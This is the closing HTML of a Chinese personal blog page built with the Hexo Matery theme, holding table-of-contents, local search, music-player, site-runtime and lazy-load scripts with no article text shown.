        selection.selectAllChildren(newdiv);
        window.setTimeout(function () {bodyElement.removeChild(newdiv);}, 200);
    });
</script>


<!-- 代码块功能依赖 -->
<script type="text/javascript" src="/libs/codeBlock/codeBlockFuction.js"></script>

<!-- 代码语言 -->

<script type="text/javascript" src="/libs/codeBlock/codeLang.js"></script>


<!-- 代码块复制 -->

<script type="text/javascript" src="/libs/codeBlock/codeCopy.js"></script>


<!-- 代码块收缩 -->

<script type="text/javascript" src="/libs/codeBlock/codeShrink.js"></script>


    </div>
    <div id="toc-aside" class="expanded col l3 hide-on-med-and-down">
        <div class="toc-widget card" style="background-color: white;">
            <div class="toc-title"><i class="far fa-list-alt"></i>&nbsp;&nbsp;目录</div>
            <div id="toc-content"></div>
        </div>
    </div>
</div>

<!-- TOC 悬浮按钮. -->

<div id="floating-toc-btn" class="hide-on-med-and-down">
    <a class="btn-floating btn-large bg-color">
        <i class="fas fa-list-ul"></i>
    </a>
</div>


<script src="/libs/tocbot/tocbot.min.js"></script>
<script>
    $(function () {
        tocbot.init({
            tocSelector: '#toc-content',
            contentSelector: '#articleContent',
            headingsOffset: -($(window).height() * 0.4 - 45),
            collapseDepth: Number('0'),
            headingSelector: 'h2, h3, h4'
        });

        // modify the toc link href to support Chinese.
        let i = 0;
        let tocHeading = 'toc-heading-';
        $('#toc-content a').each(function () {
            $(this).attr('href', '#' + tocHeading + (++i));
        });

        // modify the heading title id to support Chinese.
        i = 0;
        $('#articleContent').children('h2, h3, h4').each(function () {
            $(this).attr('id', tocHeading + (++i));
        });

        // Set scroll toc fixed.
        let tocHeight = parseInt($(window).height() * 0.4 - 64);
        let $tocWidget = $('.toc-widget');
        $(window).scroll(function () {
            let scroll = $(window).scrollTop();
            /* add post toc fixed. */
            if (scroll > tocHeight) {
                $tocWidget.addClass('toc-fixed');
            } else {
                $tocWidget.removeClass('toc-fixed');
            }
        });

        
        /* 修复文章卡片 div 的宽度. */
        let fixPostCardWidth = function (srcId, targetId) {
            let srcDiv = $('#' + srcId);
            if (srcDiv.length === 0) {
                return;
            }

            let w = srcDiv.width();
            if (w >= 450) {
                w = w + 21;
            } else if (w >= 350 && w < 450) {
                w = w + 18;
            } else if (w >= 300 && w < 350) {
                w = w + 16;
            } else {
                w = w + 14;
            }
            $('#' + targetId).width(w);
        };

        // 切换TOC目录展开收缩的相关操作.
        const expandedClass = 'expanded';
        let $tocAside = $('#toc-aside');
        let $mainContent = $('#main-content');
        $('#floating-toc-btn .btn-floating').click(function () {
            if ($tocAside.hasClass(expandedClass)) {
                $tocAside.removeClass(expandedClass).hide();
                $mainContent.removeClass('l9');
            } else {
                $tocAside.addClass(expandedClass).show();
                $mainContent.addClass('l9');
            }
            fixPostCardWidth('artDetail', 'prenext-posts');
        });
        
    });
</script>

    

</main>




    <footer class="page-footer bg-color">
    
        <link rel="stylesheet" href="/libs/aplayer/APlayer.min.css">
<style>
    .aplayer .aplayer-lrc p {
        
        display: none;
        
        font-size: 12px;
        font-weight: 700;
        line-height: 16px !important;
    }

    .aplayer .aplayer-lrc p.aplayer-lrc-current {
        
        display: none;
        
        font-size: 15px;
        color: #42b983;
    }

    
    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body {
        left: -66px !important;
    }

    .aplayer.aplayer-fixed.aplayer-narrow .aplayer-body:hover {
        left: 0px !important;
    }

    
</style>
<div class="">
    
    <div class="row">
        <meting-js class="col l8 offset-l2 m10 offset-m1 s12"
                   server="netease"
                   type="playlist"
                   id="503838841"
                   fixed='true'
                   autoplay='false'
                   theme='#42b983'
                   loop='all'
                   order='random'
                   preload='auto'
                   volume='0.7'
                   list-folded='true'
        >
        </meting-js>
    </div>
</div>

<script src="/libs/aplayer/APlayer.min.js"></script>
<script src="https://cdn.jsdelivr.net/npm/meting@2/dist/Meting.min.js"></script>

    
    <div class="container row center-align" style="margin-bottom: 15px !important;">
        <div class="col s12 m8 l8 copy-right">
            Copyright&nbsp;&copy;
            
                <span id="year">2022</span>
            
            <span id="year">2022</span>
            <a href="/about" target="_blank">Wuhen</a>
            |&nbsp;Powered by&nbsp;<a href="https://hexo.io/" target="_blank">Hexo</a>
            |&nbsp;Theme&nbsp;<a href="https://github.com/blinkfox/hexo-theme-matery" target="_blank">Matery</a>
            <br>
            
            &nbsp;<i class="fas fa-chart-area"></i>&nbsp;站点总字数:&nbsp;<span
                class="white-color">21.1k</span>&nbsp;字
            
            
            
            
            
            
            <span id="busuanzi_container_site_pv">
                |&nbsp;<i class="far fa-eye"></i>&nbsp;总访问量:&nbsp;<span id="busuanzi_value_site_pv"
                    class="white-color"></span>&nbsp;次
            </span>
            
            
            <span id="busuanzi_container_site_uv">
                |&nbsp;<i class="fas fa-users"></i>&nbsp;总访问人数:&nbsp;<span id="busuanzi_value_site_uv"
                    class="white-color"></span>&nbsp;人
            </span>
            
            <br>
            
            <span id="sitetime">载入运行时间...</span>
            <script>
                function siteTime() {
                    var seconds = 1000;
                    var minutes = seconds * 60;
                    var hours = minutes * 60;
                    var days = hours * 24;
                    var years = days * 365;
                    var today = new Date();
                    var startYear = "2022";
                    var startMonth = "9";
                    var startDate = "26";
                    var startHour = "23";
                    var startMinute = "20";
                    var startSecond = "10";
                    var todayYear = today.getFullYear();
                    var todayMonth = today.getMonth() + 1;
                    var todayDate = today.getDate();
                    var todayHour = today.getHours();
                    var todayMinute = today.getMinutes();
                    var todaySecond = today.getSeconds();
                    var t1 = Date.UTC(startYear, startMonth, startDate, startHour, startMinute, startSecond);
                    var t2 = Date.UTC(todayYear, todayMonth, todayDate, todayHour, todayMinute, todaySecond);
                    var diff = t2 - t1;
                    var diffYears = Math.floor(diff / years);
                    var diffDays = Math.floor((diff / days) - diffYears * 365);
                    var diffHours = Math.floor((diff - (diffYears * 365 + diffDays) * days) / hours);
                    var diffMinutes = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours) /
                        minutes);
                    var diffSeconds = Math.floor((diff - (diffYears * 365 + diffDays) * days - diffHours * hours -
                        diffMinutes * minutes) / seconds);
                    if (startYear == todayYear) {
                        document.getElementById("year").innerHTML = todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffDays + " 天 " + diffHours +
                            " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    } else {
                        document.getElementById("year").innerHTML = startYear + " - " + todayYear;
                        document.getElementById("sitetime").innerHTML = "本站已安全运行 " + diffYears + " 年 " + diffDays +
                            " 天 " + diffHours + " 小时 " + diffMinutes + " 分钟 " + diffSeconds + " 秒";
                    }
                }
                setInterval(siteTime, 1000);
            </script>
            
            <br>
            
        </div>
        <div class="col s12 m4 l4 social-link social-statis">
    <a href="https://github.com/wuhenfeng" class="tooltipped" target="_blank" data-tooltip="访问我的GitHub" data-position="top" data-delay="50">
        <i class="fab fa-github"></i>
    </a>



    <a href="mailto:1834744169@qq.com" class="tooltipped" target="_blank" data-tooltip="邮件联系我" data-position="top" data-delay="50">
        <i class="fas fa-envelope-open"></i>
    </a>







    <a href="tencent://AddContact/?fromId=50&fromSubId=1&subcmd=all&uin=1834744169" class="tooltipped" target="_blank" data-tooltip="QQ联系我: 1834744169" data-position="top" data-delay="50">
        <i class="fab fa-qq"></i>
    </a>







    <a href="/atom.xml" class="tooltipped" target="_blank" data-tooltip="RSS 订阅" data-position="top" data-delay="50">
        <i class="fas fa-rss"></i>
    </a>

</div>
    </div>
</footer>

<div class="progress-bar"></div>


    <!-- 搜索遮罩框 -->
<div id="searchModal" class="modal">
    <div class="modal-content">
        <div class="search-header">
            <span class="title"><i class="fas fa-search"></i>&nbsp;&nbsp;搜索</span>
            <input type="search" id="searchInput" name="s" placeholder="请输入搜索的关键字"
                   class="search-input">
        </div>
        <div id="searchResult"></div>
    </div>
</div>

<script type="text/javascript">
$(function () {
    var searchFunc = function (path, search_id, content_id) {
        'use strict';
        $.ajax({
            url: path,
            dataType: "xml",
            success: function (xmlResponse) {
                // get the contents from search data
                var datas = $("entry", xmlResponse).map(function () {
                    return {
                        title: $("title", this).text(),
                        content: $("content", this).text(),
                        url: $("url", this).text()
                    };
                }).get();
                var $input = document.getElementById(search_id);
                var $resultContent = document.getElementById(content_id);
                $input.addEventListener('input', function () {
                    var str = '<ul class=\"search-result-list\">';
                    var keywords = this.value.trim().toLowerCase().split(/[\s\-]+/);
                    $resultContent.innerHTML = "";
                    if (this.value.trim().length <= 0) {
                        return;
                    }
                    // perform local searching
                    datas.forEach(function (data) {
                        var isMatch = true;
                        var data_title = data.title.trim().toLowerCase();
                        var data_content = data.content.trim().replace(/<[^>]+>/g, "").toLowerCase();
                        var data_url = data.url;
                        data_url = data_url.indexOf('/') === 0 ? data.url : '/' + data_url;
                        var index_title = -1;
                        var index_content = -1;
                        var first_occur = -1;
                        // only match artiles with not empty titles and contents
                        if (data_title !== '' && data_content !== '') {
                            keywords.forEach(function (keyword, i) {
                                index_title = data_title.indexOf(keyword);
                                index_content = data_content.indexOf(keyword);
                                if (index_title < 0 && index_content < 0) {
                                    isMatch = false;
                                } else {
                                    if (index_content < 0) {
                                        index_content = 0;
                                    }
                                    if (i === 0) {
                                        first_occur = index_content;
                                    }
                                }
                            });
                        }
                        // show search results
                        if (isMatch) {
                            str += "<li><a href='" + data_url + "' class='search-result-title'>" + data_title + "</a>";
                            var content = data.content.trim().replace(/<[^>]+>/g, "");
                            if (first_occur >= 0) {
                                // cut out 100 characters
                                var start = first_occur - 20;
                                var end = first_occur + 80;
                                if (start < 0) {
                                    start = 0;
                                }
                                if (start === 0) {
                                    end = 100;
                                }
                                if (end > content.length) {
                                    end = content.length;
                                }
                                var match_content = content.substr(start, end);
                                // highlight all keywords
                                keywords.forEach(function (keyword) {
                                    var regS = new RegExp(keyword, "gi");
                                    match_content = match_content.replace(regS, "<em class=\"search-keyword\">" + keyword + "</em>");
                                });

                                str += "<p class=\"search-result\">" + match_content + "...</p>"
                            }
                            str += "</li>";
                        }
                    });
                    str += "</ul>";
                    $resultContent.innerHTML = str;
                });
            }
        });
    };

    searchFunc('/search.xml', 'searchInput', 'searchResult');
});
</script>

    <!-- 回到顶部按钮 -->
<div id="backTop" class="top-scroll">
    <a class="btn-floating btn-large waves-effect waves-light" href="#!">
        <i class="fas fa-arrow-up"></i>
    </a>
</div>


    <script type="text/javascript">
    var windowWidth = $(window).width();
    if (windowWidth > 768){
        document.write('<script type="text/javascript" src="/js/sakura.js"><\/script>')
    }
    </script>

    <script src="/libs/materialize/materialize.min.js"></script>
    <script src="/libs/masonry/masonry.pkgd.min.js"></script>
    <script src="/libs/aos/aos.js"></script>
    <script src="/libs/scrollprogress/scrollProgress.min.js"></script>
    <script src="/libs/lightGallery/js/lightgallery-all.min.js"></script>
    <script src="/js/matery.js"></script>

    <!-- Baidu Analytics -->

    <!-- Baidu Push -->

<script>
    (function () {
        var bp = document.createElement('script');
        var curProtocol = window.location.protocol.split(':')[0];
        if (curProtocol === 'https') {
            bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';
        } else {
            bp.src = 'http://push.zhanzhang.baidu.com/push.js';
        }
        var s = document.getElementsByTagName("script")[0];
        s.parentNode.insertBefore(bp, s);
    })();
</script>

    
    <script src="/libs/others/clicklove.js" async="async"></script>
    
    
    <script async src="/libs/others/busuanzi.pure.mini.js"></script>
    

    

    

	
    

    

    

    
    <script src="/libs/instantpage/instantpage.js" type="module"></script>
    
    <canvas class="fireworks" style="position: fixed;left: 0;top: 0;z-index: 1; pointer-events: none;" ></canvas> 
    <script type="text/javascript" src="//cdn.bootcss.com/animejs/2.2.0/anime.min.js"></script> 
    <script type="text/javascript" src="/js/firework.js"></script>
<script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"log":false,"model":{"jsonPath":"/live2dw/assets/z16.model.json"},"display":{"position":"right","width":150,"height":300},"mobile":{"show":true,"react":{"opacity":0.7}}});</script>
        <style>
            [bg-lazy] {
                background-image: none !important;
                background-color: #eee !important;
            }
        </style>
        <script>
            window.imageLazyLoadSetting = {
                isSPA: false,
                preloadRatio: 1,
                processImages: null,
            };
        </script><script>window.addEventListener("load",function(){var t=/\.(gif|jpg|jpeg|tiff|png)$/i,r=/^data:image\/[a-z]+;base64,/;Array.prototype.slice.call(document.querySelectorAll("img[data-original]")).forEach(function(a){var e=a.parentNode;"A"===e.tagName&&(e.href.match(t)||e.href.match(r))&&(e.href=a.dataset.original)})});</script><script>!function(e){e.imageLazyLoadSetting.processImages=t;var n=e.imageLazyLoadSetting.isSPA,i=e.imageLazyLoadSetting.preloadRatio||1,r=o();function o(){var t=Array.prototype.slice.call(document.querySelectorAll("img[data-original]")),e=Array.prototype.slice.call(document.querySelectorAll("[bg-lazy]"));return t.concat(e)}function t(){n&&(r=o());for(var t,a=0;a<r.length;a++)0<=(t=(t=r[a]).getBoundingClientRect()).bottom&&0<=t.left&&t.top<=(e.innerHeight*i||document.documentElement.clientHeight*i)&&function(){var t,e,n,i,o=r[a];e=function(){r=r.filter(function(t){return o!==t})},(t=o).hasAttribute("bg-lazy")?(t.removeAttribute("bg-lazy"),e&&e()):(n=new Image,i=t.getAttribute("data-original"),n.onload=function(){t.src=i,t.removeAttribute("data-original"),e&&e()},t.src!==i&&(n.src=i))}()}function a(){clearTimeout(t.tId),t.tId=setTimeout(t,500)}t(),document.addEventListener("scroll",a),e.addEventListener("resize",a),e.addEventListener("orientationchange",a)}(this);</script></body>

</html>
